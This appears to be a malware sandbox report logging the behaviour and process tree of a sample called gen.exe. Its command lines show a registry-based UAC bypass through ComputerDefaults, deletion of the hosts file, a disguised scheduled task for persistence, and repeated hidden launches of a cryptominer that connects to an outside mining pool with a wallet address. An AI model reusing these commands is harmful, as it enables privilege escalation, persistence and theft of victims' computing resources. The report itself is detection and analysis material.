N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4256 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\gen.exe C:\Windows\SysWOW64\reg.exe
PID 4256 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\gen.exe C:\Windows\SysWOW64\reg.exe
PID 4256 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\gen.exe C:\Windows\SysWOW64\reg.exe
PID 4256 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\gen.exe C:\Windows\SysWOW64\reg.exe
PID 4256 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\gen.exe C:\Windows\SysWOW64\reg.exe
PID 4256 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\gen.exe C:\Windows\SysWOW64\reg.exe
PID 4256 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\gen.exe C:\Windows\SysWOW64\cmd.exe
PID 4256 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\gen.exe C:\Windows\SysWOW64\cmd.exe
PID 4256 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\gen.exe C:\Windows\SysWOW64\cmd.exe
PID 3696 wrote to memory of 4468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ComputerDefaults.exe
PID 3696 wrote to memory of 4468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ComputerDefaults.exe
PID 3696 wrote to memory of 4468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ComputerDefaults.exe
PID 4468 wrote to memory of 1932 N/A C:\Windows\SysWOW64\ComputerDefaults.exe C:\Windows\SysWOW64\wscript.exe
PID 4468 wrote to memory of 1932 N/A C:\Windows\SysWOW64\ComputerDefaults.exe C:\Windows\SysWOW64\wscript.exe
PID 4468 wrote to memory of 1932 N/A C:\Windows\SysWOW64\ComputerDefaults.exe C:\Windows\SysWOW64\wscript.exe
PID 1932 wrote to memory of 3944 N/A C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 3944 N/A C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 3944 N/A C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\cmd.exe
PID 4256 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\gen.exe C:\Windows\SysWOW64\cmd.exe
PID 4256 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\gen.exe C:\Windows\SysWOW64\cmd.exe
PID 4256 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\gen.exe C:\Windows\SysWOW64\cmd.exe
PID 3176 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3176 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3176 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1632 wrote to memory of 4908 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 4908 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1632 wrote to memory of 3244 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\gen.exe

"C:\Users\Admin\AppData\Local\Temp\gen.exe"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\chinahalf1930182.vbs" /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C computerdefaults.exe

C:\Windows\SysWOW64\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\SysWOW64\wscript.exe

"wscript.exe" C:\Users\Admin\AppData\Local\Temp\chinahalf1930182.vbs

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN TwitchUpdater_A7Q2drImVArLnmrvI050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\A7Q2drImVArLnmrvI050MX.exe" /RL HIGHEST /IT

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC ONLOGON /TN TwitchUpdater_A7Q2drImVArLnmrvI050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\A7Q2drImVArLnmrvI050MX.exe" /RL HIGHEST /IT

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb1ce69758,0x7ffb1ce69768,0x7ffb1ce69778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2200 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3196 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3220 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4476 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4936 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4748 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\ek3b4ofg.exe

"C:\Users\Admin\AppData\Local\Temp\ek3b4ofg.exe" explorer.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4744 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5320 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5048 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3452 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=1452 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3920 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig -RUN -reboot-times 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=1756 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004E8 0x00000000000004E4

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3272 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5556 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5624 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:8

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig -RUN -reboot-times 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1112 --field-trial-handle=1800,i,14875449822548662101,15778103107396109306,131072 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\Temp1_gen_build.zip\gen.exe

"C:\Users\Admin\AppData\Local\Temp\Temp1_gen_build.zip\gen.exe"

C:\Windows\system32\wscript.exe

"wscript.exe" C:\Users\Admin\AppData\Local\Temp\chinahalf1930182.vbs

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig -RUN -reboot-times 0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig -RUN -reboot-times 0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig -RUN -reboot-times 0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig -RUN -reboot-times 0

C:\Users\Admin\AppData\Local\Temp\Temp1_gen_build.zip\gen.exe

"C:\Users\Admin\AppData\Local\Temp\Temp1_gen_build.zip\gen.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig -RUN -reboot-times 0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig -RUN -reboot-times 0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe

C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RHMTwiUaeDeo3EHxkhUGvvvjDeVXSAaY4H/LCRig

